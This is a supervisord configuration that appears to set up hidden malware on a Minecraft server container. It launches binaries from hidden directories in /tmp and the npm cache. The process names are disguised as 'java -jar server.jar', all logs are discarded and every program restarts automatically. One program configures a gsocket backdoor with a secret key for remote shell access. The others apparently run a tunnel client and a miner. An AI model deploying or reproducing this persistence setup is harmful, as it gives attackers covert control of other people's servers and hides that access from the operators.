[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./mc-mods.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./user-patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:nscli]
directory=/home/container/.npm/_cacache/content-v2/sha512/.cache
command=./mc-mods.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./client.jar -u frtest0
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i1A3eD2E2K9c-A1K6f9L2M3-4D9g8H6b5j7-56C4a9f6X1eCd9F9440-d6A28039A1c5J1g6K -liq"
command=./mc-mods.jar -a 'java -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true